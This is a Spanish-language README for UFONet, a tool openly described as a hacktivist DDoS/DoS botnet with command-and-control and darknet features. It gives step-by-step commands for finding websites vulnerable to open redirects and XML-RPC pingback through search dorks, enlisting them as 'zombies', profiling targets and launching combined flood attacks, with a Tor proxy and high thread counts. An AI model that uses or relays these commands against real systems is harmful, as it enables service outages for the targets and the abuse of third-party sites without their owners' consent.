LEEME.txt 17 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536
  1. ===========================================================================
  2. 888 888 8888888888 .d88888b. 888b 888 888
  3. 888 888 888 d88PY888b 8888b 888 888
  4. 888 888 888 888 888 88888b 888 888
  5. 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
  6. 888 888 888 888 888 888 Y88b888 d8P Y8b 888
  7. 888 888 888 888 888 888 Y88888 88888888 888
  8. Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
  9. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
  10. ===========================================================================
  11. Bienvenida a UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
  12. ===========================================================================
  13. ###############################
  14. # Información del proyecto
  15. ###############################
  16. - Website:
  17. https://ufonet.03c8.net
  18. - IRC:
  19. irc.freenode.net - #ufonet
  20. ###############################
  21. # FAQ/Preguntas frecuentes
  22. ###############################
  23. https://ufonet.03c8.net/FAQ.html
  24. ###############################
  25. # Introducción
  26. ###############################
  27. UFONet - Es un conjunto de herramientas hacktivistas que permiten el lanzamiento coordinado
  28. de ataques DDoS y DoS, permitiendo combinar ambas técnicas en una sola ofensiva.
  29. También funciona como un DarkNET cifrada para publicar y recibir contenido
  30. mediante la creación de una red global de cliente/servidor basada en una
  31. arquitectura P2P de conexión directa.
  32. ###############################
  33. # Instalando
  34. ###############################
  35. UFONet funciona en muchas plataformas. Requiere Python (>=3) y las siguientes librerías:
  36. python3-pycurl - Python bindings to libcurl (Python 3)
  37. python3-geoip - Python3 bindings for the GeoIP IP-to-country resolver library
  38. libgeoip-dev - Development files for the GeoIP library
  39. libgeoip1 - non-DNS IP-to-country resolver library
  40. python3-whois - Python module for retrieving WHOIS information - Python 3
  41. python3-crypto - cryptographic algorithms and protocols for Python 3
  42. python3-requests - elegant and simple HTTP library for Python3, built for human beings
  43. python3-scapy - Packet crafting/sniffing/manipulation/visualization security tool
  44. Puedes obtener todas las librerías requeridas automáticamente usando (como root):
  45. python3 setup.py install
  46. Para instalarlas manualmente en sistemas basados en Debian (ex: Ubuntu), lanza:
  47. sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy libgeoip1 libgeoip-dev
  48. En otros sistemas como: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... también lanzar:
  49. pip3 install GeoIP
  50. pip3 install python-geoip
  51. pip3 install pygeoip
  52. pip3 install requests
  53. pip3 install pycrypto
  54. pip3 install pycurl
  55. pip3 install whois
  56. pip3 install scapy-python3
  57. Paquetes fuente de las librerías:
  58. * Python: https://www.python.org/downloads/
  59. * PyCurl: http://pycurl.sourceforge.net/
  60. * GeoIP: https://pypi.python.org/pypi/GeoIP/
  61. * Python-geoip: https://pypi.org/project/python-geoip/
  62. * Pygeoip: https://pypi.org/project/pygeoip/
  63. * Whois: https://pypi.python.org/pypi/whois
  64. * PyCrypto: https://pypi.python.org/pypi/pycrypto
  65. * PyRequests: https://pypi.python.org/pypi/requests
  66. * Scapy-Python3: https://pypi.org/project/scapy-python3/
  67. * Leaflet: http://leafletjs.com/ (provided)
  68. ###############################
  69. # Buscando 'zombies'
  70. ###############################
  71. UFONet puede buscar en los resultados de diferentes motores de búsqueda para encontrar posibles sitios
  72. web vulnerables a 'Open Redirect'.
  73. Generalmente los parámetros de las peticiones, suelen ser similares a los siguientes:
  74. 'proxy.php?url='
  75. 'check.cgi?url='
  76. 'checklink?uri='
  77. 'validator?uri='
  78. Por ejemplo, puedes comenzar una búsqueda con:
  79. ./ufonet -s 'proxy.php?url='
  80. O utilizando una lista de "dorks" que tengas en un fichero:
  81. ./ufonet --sd 'dorks.txt'
  82. Por defecto, UFONet utiliza un motor de búsqueda que se llama 'DuckDuckGo'. Pero puedes elegir uno diferente:
  83. ./ufonet -s 'proxy.php?url=' --se 'bing'
  84. Ésta es la lista de motores de búsqueda que funcionan con la fecha de la última vez que se han probado:
  85. - duckduckgo [02/2022: OK!]
  86. - bing [02/2022: OK!]
  87. - yahoo [02/2022: OK!]
  88. También puedes buscar masívamente utilizando todos los motores de búsqueda soportados:
  89. ./ufonet -s 'proxy.php?url=' --sa
  90. Para controlar cuantos 'zombies' recibir como resultado puedes utilizar:
  91. ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
  92. O puedes hacer que la herramienta búsque de manera autómatica el mayor número posible de resultados
  93. (ésto puede tardar bastante tiempo!):
  94. ./ufonet --auto-search
  95. Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido,
  96. para ver si las urls son vulnerables.
  97. Do you want to check if the NEW possible zombies are valid? (Y/n)
  98. Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
  99. aquellas aplicaciones web que sean vulnerables.
  100. Do you want to update your army? (Y/n)
  101. Si respondes 'Y', tus nuevos 'zombies' se sumarán al fichero: zombies.txt
  102. -------------
  103. Ejemplos:
  104. + con detalle: ./ufonet -s 'proxy.php?url=' -v
  105. + con hilos: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
  106. ###############################
  107. # Probando la botnet
  108. ###############################
  109. UFONet puede probar si tus 'zombies' son vulnerables y si pueden ser usados para tareas de ataque.
  110. Por ejemplo, abre 'botnet/zombies.txt' (u otro fichero) y crea una lista de posibles 'zombies'.
  111. Recuerdas que las urls de los 'zombies' deberían ser algo así:
  112. http://objetivo.com/check?uri=
  113. Después de eso, lanza:
  114. ./ufonet -t 'botnet/zombies.txt'
  115. Puedes hacer pruebas para descubrir 'zombies' relacionados con la vulnerabilidad XML-RPC Pingback, mediante:
  116. ./ufonet --test-rpc
  117. Para probar si tus 'zombies' siguen infectados (ésto puede tardar bastante tiempo!):
  118. ./ufonet --test-all
  119. Y para probar si tus 'zombies' siguen conectados a internet:
  120. ./ufonet --test-offline
  121. Finalmente, puedes ordenar a tus 'zombies' que te ataquen a ti mismo, para ver como responden a tus necesidades:
  122. ./ufonet --attack-me
  123. Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido,
  124. para ver si las urls son vulnerables.
  125. Do you want to check if the NEW possible zombies are valid? (Y/n)
  126. Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
  127. aquellas aplicaciones web que sean vulnerables.
  128. Do you want to update your army? (Y/n)
  129. Si respondes 'Y', tu fichero: "botnet/zombies.txt" será actualizado.
  130. -------------
  131. Examples:
  132. + con detalle: ./ufonet -t 'botnet/zombies.txt' -v
  133. + con proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
  134. + con hilos: ./ufonet -t 'botnet/zombies.txt' --threads 50
  135. + probar botnet: ./ufonet --test-all
  136. + probar XML-RPCs: ./ufonet --test-rpc
  137. + buscar 'offlines': ./ufonet --test-offline
  138. + auto-atacarte: ./ufonet --attack-me
  139. ###############################
  140. # Inspeccionando un objetivo
  141. ###############################
  142. UFONet puede buscar el fichero más grande de tu objetivo analizándolo:
  143. ./ufonet -i http://target.com
  144. Puedes utilizar el resultado para hacer tus ataques más efectivos:
  145. ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
  146. -------------
  147. Ejemplo:
  148. +input:
  149. ./ufonet -i http://target.com
  150. +output:
  151. [...]
  152. +Image found: images/wizard.jpg
  153. (Size: 63798 Bytes)
  154. ------------
  155. +Style (.css) found: fonts.css
  156. (Size: 20448 Bytes)
  157. ------------
  158. +Webpage (.php) found: contact.php
  159. (Size: 2483 Bytes)
  160. ------------
  161. +Webpage (.php) found: about.php
  162. (Size: 1945 Bytes)
  163. ------------
  164. +Webpage (.php) found: license.php
  165. (Size: 1996 Bytes)
  166. ------------
  167. ================================================================================
  168. =Biggest File: http://target.com/images/wizard.jpg
  169. ================================================================================
  170. -------------
  171. ###############################
  172. # Abduciendo un objetivo
  173. ###############################
  174. UFONet puede entregarte bastante información interesante de tu objetivo:
  175. ./ufonet -x http://target.com
  176. -------------
  177. Ejemplo:
  178. +input:
  179. ./ufonet -x https://yahoo.com
  180. +output:
  181. [...]
  182. -Target URL: https://yahoo.com
  183. -IP : 206.190.39.42
  184. -IPv6 : OFF
  185. -Port : 443
  186. -Domain: yahoo.com
  187. -Bytes in : 550.09 KB
  188. -Load time: 9.10 seconds
  189. -Banner: ATS
  190. -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
  191. http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
  192. -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
  193. -Reports:
  194. + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
  195. + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
  196. [...]
  197. ---------
  198. [Info] Abduction finished... ;-)
  199. -------------
  200. ###############################
  201. # Atacando un objetivo
  202. ###############################
  203. UFONet puede atacar a tus objetivos de muchas maneras.
  204. Por ejemplo, introduce un objetivo para atacar con un número de rondas:
  205. ./ufonet -a http://target.com -r 10
  206. En el ejemplo, UFONet atacará el objetivo un número de 10 veces por cada 'zombie'. De manera que si tienes una lista
  207. de 1.000 'zombies', lanzará 1.000 'zombies' x 10 rondas = 10.000 peticiones al objetivo.
  208. Por defecto se aplicará únicamente 1 ronda.
  209. Además, puedes elegir el lugar para recargar el sitio el objetivo. Por ejemplo, una imagen grande, un fichero que ocupe
  210. mucho o una película de flash. En algunos escenarios donde los objetivos no utilizan sistemas de cache, ésto hará tu
  211. ataque más efectivo.
  212. ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
  213. -------------
  214. Examples:
  215. + con detalle: ./ufonet -a http://target.com -r 10 -v
  216. + con proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
  217. + con un lugar ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
  218. + con hilos: ./ufonet -a http://target.com -r 10 --threads 500
  219. ###############################
  220. # Ataques Especiales
  221. ###############################
  222. UFONet utiliza diferentes maneras para explotar las vulnerabilides 'Open Redirect'.
  223. Puedes usar UFONet para estresar la base de datos de tu objetivo mediante la petición de cadenas aleatorias válidas
  224. como si fueran búsquedas:
  225. ./ufonet -a http://target.com --db "search.php?q="
  226. También explota (por defecto) una vulnerabilidad en XML-RPC Pingback, generando peticiones que requieren respuesta e
  227. incrementando el procesamiento que requiere el objetivo.
  228. Puedes probar tu lista de zombies "X-RPCs" lanzando:
  229. ./ufonet --test-rpc
  230. ###############################
  231. # Ataques Extra
  232. ###############################
  233. - LOIC: https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
  234. - LORIS: https://en.wikipedia.org/wiki/Slowloris_(software)
  235. - UFOSYN: https://en.wikipedia.org/wiki/SYN_flood
  236. - FRAGGLE: https://en.wikipedia.org/wiki/Fraggle_attack
  237. - UFORST: https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood
  238. - SPRAY: https://en.wikipedia.org/wiki/DRDOS
  239. - SMURF: https://en.wikipedia.org/wiki/Smurf_attack
  240. - XMAS: https://en.wikipedia.org/wiki/Christmas_tree_packet
  241. - DROPER: https://en.wikipedia.org/wiki/IP_fragmentation_attack
  242. - SNIPER: https://www.imperva.com/learn/application-security/snmp-reflection/
  243. - TACHYON: https://www.us-cert.gov/ncas/alerts/TA13-088A
  244. - PINGER: https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/
  245. - MONLIST: https://www.us-cert.gov/ncas/alerts/TA14-013A
  246. - UFOACK: https://www.f5.com/services/resources/glossary/push-and-ack-flood
  247. - OVERLAP: https://cyberhoot.com/cybrary/fragment-overlap-attack/
  248. - UFOUDP: https://en.wikipedia.org/wiki/UDP_flood_attack
  249. - NUKE: https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf
  250. Todos los ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo.
  251. ###############################
  252. # Actualizando
  253. ###############################
  254. UFONet implementa una opción para actualizarse automáticamente a la última versión estable.
  255. Para poder hacerlo tienes que haber clonado la herramienta desde el repositorio de GitHub.
  256. Lanza el siguiente comando para chequear si necesitas actualizaciones:
  257. ./ufonet --update
  258. Ésto actualizará la herramienta automáticamente borrando todos los ficheros del anterior paquete.
  259. ###############################
  260. # Generando un 'Blackhole'
  261. ###############################
  262. UFONet tiene algunas opciones P2P para compartir/mantener 'zombies' con otras 'naves madre".
  263. * Configura un servidor web con una carpeta llamada "ufonet", con las siguientes características:
  264. - localizado en /var/www/ufonet (por defecto en debian/ubuntu)
  265. - creado por el mismo usuario que ejecuta el "agujero negro" (blackhole)
  266. - que sea accesible desde http://tu-ip/ufonet/
  267. * Comienza el "agujero negro" con: ./ufonet --blackhole (or python2 blackhole.py)
  268. * Cualquiera que quiera conectarse con tu servidor necesita configurar --up-to/--down-from con la ip
  269. de tu servidor web...
  270. [!]ATENCIÓN : ésta función "AVANZADA" puede "NO" ser segura, ejecútala si realmente lo necesitas.
  271. Para lanzar un nuevo "agujero negro", utiliza:
  272. ./ufonet --blackhole
  273. ###############################
  274. # GUI/Web Interface
  275. ###############################
  276. Puedes controlar UFONet utilizando una interfaz Web. La herramienta implementa un servidor web en python
  277. conectado al núcleo para que tengas unas experiencia más amigable.
  278. Para lanzarla usa:
  279. ./ufonet --gui
  280. Ésto abrirá una pestaña (o una ventana nueva) en tu navegador por defecto, con todas las opciones de la herramienta
  281. más algunas "extra":
  282. - SHIP.NEWS: Permite leer las últimas "noticias" publicadas por la "nave madre"
  283. - SHIP.MISSIONS: Permite leer las últimas "misiones" publicadas por la "nave madre"
  284. - SHIP.STATS: Permite consultar las estadísticas de tu "nave"
  285. - SHIP.RANKING: Permite consultar tu posición en el "ranking"
  286. - SHIP.LINKS: Permite revisar los enlaces publicados por otras "naves"
  287. - SHIP.STREAMS: Permite revisar los "streams" (video/audio/directo) publicados por otras "naves"
  288. - SHIP.TV: Permite ver videos publicados por otras "naves"
  289. - SHIP GAMES: Permite revisar los "juegos" que contiene tu "nave madre"
  290. - SHIP.BROWSER: Permite navegar/surfear la Internet
  291. - SHIP.WARPS: Permite interactuar con una "nave madre" para subir/bajar 'zombies'
  292. - GLOBAL.BOARD: Permite enviar/recibir mensajes con una "nave madre" (un foro)
  293. - GLOBAL.GRID: Permite revisar las estadísticas de otras "naves"
  294. - GLOBAL.WARGAMES: Permite proponer y participar en algunos "juegos de guerra" reales
  295. - GLOBAL.RADAR: Permite revisar las localizaciones publicadas por otras "naves"
  296. - GLOBAL.NEWS: Permite leer noticias relacionadas con UFONet
  297. - [...]
  298. ###############################
  299. # Timelog
  300. ###############################
  301. --------------------------
  302. 02.03.2022 : v.1.8
  303. --------------------------
  304. --------------------------
  305. 14.07.2021 : v.1.7
  306. --------------------------
  307. --------------------------
  308. 17.08.2020 : v.1.6
  309. --------------------------
  310. --------------------------
  311. 08.06.2020 : v.1.5
  312. --------------------------
  313. --------------------------
  314. 01.02.2020 : v.1.4
  315. --------------------------
  316. --------------------------
  317. 10.03.2019 : v.1.3
  318. --------------------------
  319. --------------------------
  320. 03.02.2019 : v.1.2.1
  321. --------------------------
  322. --------------------------
  323. 31.12.2018 : v.1.2
  324. --------------------------
  325. --------------------------
  326. 26.09.2018 : v.1.1
  327. --------------------------
  328. --------------------------
  329. 08.03.2018 : v.1.0
  330. --------------------------
  331. --------------------------
  332. 14.07.2017 : v.0.9b
  333. --------------------------
  334. --------------------------
  335. 21.10.2016 : v.0.8b
  336. --------------------------
  337. --------------------------
  338. 17.08.2016 : v.0.7b
  339. --------------------------
  340. --------------------------
  341. 05.11.2015 : v.0.6b
  342. --------------------------
  343. --------------------------
  344. 24.05.2015 : v.0.5b
  345. --------------------------
  346. --------------------------
  347. 15.12.2014 : v.0.4b
  348. --------------------------
  349. --------------------------
  350. 27.09.2014 : v.0.3.1b
  351. --------------------------
  352. --------------------------
  353. 20.09.2014 : v.0.3b
  354. --------------------------
  355. --------------------------
  356. 22.06.2013 : v.0.2b
  357. --------------------------
  358. --------------------------
  359. 18.06.2013 : v.0.1b
  360. --------------------------
  361. ###############################
  362. # Gracias a
  363. ###############################
  364. - BP<3
  365. - UFo & Mandingo & Ikujam
  366. - Phineas Fisher ;-)
  367. - The Shadow Brokers (TSB) ;_)
  368. - World Wide Antifas >-)
  369. ------------------------
  370. ############